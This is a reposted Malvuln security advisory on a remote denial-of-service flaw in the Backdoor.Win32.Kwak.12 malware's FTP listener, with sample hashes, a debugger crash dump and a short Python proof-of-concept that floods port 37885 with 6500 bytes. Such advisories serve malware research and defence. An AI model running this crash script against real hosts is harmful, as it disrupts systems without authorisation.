Sunday, March 28, 2021

Backdoor.Win32.Kwak.12 Denial Of Service

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/c25393545e5ead3a35996ef9a887bd34_C.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Kwak.12
Vulnerability: Remote Denial of Service
Description: The backdoor runs an FTP server that listens on TCP port 37885. Attackers who can reach the infected host can send a payload of around 6500 bytes using socket program to cause an unknown internal exception to crash the malware.
Type: PE32
MD5: c25393545e5ead3a35996ef9a887bd34
Vuln ID: MVID-2021-0146
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 03/25/2021

Memory Dump:
(d30.1084): Unknown exception - code 0eedfade (first/second chance not available)
eax=0019fd18 ebx=03fa4458 ecx=00000007 edx=00000000 esi=03fa3af0 edi=03fa49b0
eip=75eb08f2 esp=0019fd18 ebp=0019fd70 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216
KERNELBASE!RaiseException+0x62:
75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h] ss:002b:0019fd6c=af5cfeac


0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
ExceptionCode: 0eedfade
ExceptionFlags: 00000001
NumberParameters: 7
Parameter[0]: 004151a2
Parameter[1]: 03fa6724
Parameter[2]: 03fa4458
Parameter[3]: 03fa3af0
Parameter[4]: 03fa49b0
Parameter[5]: 0019fdac
Parameter[6]: 0019fda4

DEFAULT_BUCKET_ID: DELPHI_EXCEPTION

PROCESS_NAME: Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code text>

EXCEPTION_PARAMETER1: 004151a2

EXCEPTION_PARAMETER2: 03fa6724

EXCEPTION_PARAMETER3: 03fa4458

EXCEPTION_PARAMETER4: 3fa3af0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00001084

PRIMARY_PROBLEM_CLASS: DELPHI_EXCEPTION

BUGCHECK_STR: APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER: from 004490f9 to 75eb08f2

STACK_TEXT:
0019fdbc 004490f9 03fa3af0 03fa234c 03fa3af0 KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be wrong.
0019fdf0 004490f9 03fa234c 03fa234c 03fa234c Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019fe6c 004017fa 0019ff01 0019feac 00455c3f Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019fea0 004017a5 03fa1fd0 0019ff70 00455c3f Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x7a1
0019fed4 004490f9 0046119e 0044c754 00428d70 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!_GetExceptDLLinfo+0x74c
0019ff04 0045b8cf 00000000 00461330 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x333d1
0019ff2c 0045b91e 004674e4 00000001 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45ba7
0019ff50 0045ac48 00000000 00000000 00000000 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45bf6
0019ff64 0045baf4 00000000 0019ffcc 0045688c Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x44f20
0019ff80 76198654 002b8000 76198630 c91b9631 Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+0x45dcc
0019ff94 77104a77 002b8000 3d0540e2 00000000 kernel32!BaseThreadInitThunk+0x24
0019ffdc 77104a47 ffffffff 77129eb7 00000000 ntdll!__RtlUserThreadStart+0x2f
0019ffec 00000000 00483060 002b8000 00000000 ntdll!_RtlUserThreadStart+0x1b


STACK_COMMAND: ~0s; .ecxr ; kb

FOLLOWUP_IP:
Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34!Ftpsrvcinitialization$qqrv+333d1
004490f9 8b5e10 mov ebx,dword ptr [esi+10h]

SYMBOL_STACK_INDEX: 1

SYMBOL_NAME: backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_Kwak_12_c25393545e5ead3a35996ef9a887bd34

IMAGE_NAME: Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 39a61aec

BUCKET_ID: APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_kwak_12!Ftpsrvcinitialization$qqrv+333d1

FAILURE_BUCKET_ID: DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Kwak.12.c25393545e5ead3a35996ef9a887bd34.exe!Ftpsrvcinitialization$qqrv



Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=37885

def doit():

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

PAYLOAD="A"*6500
s.send(PAYLOAD)
s.close()

print("Backdoor.Win32.Kwak.12 / Remote Denial of Service")
print("MD5: c25393545e5ead3a35996ef9a887bd34")
print("By Malvuln")


if __name__=="__main__":
doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated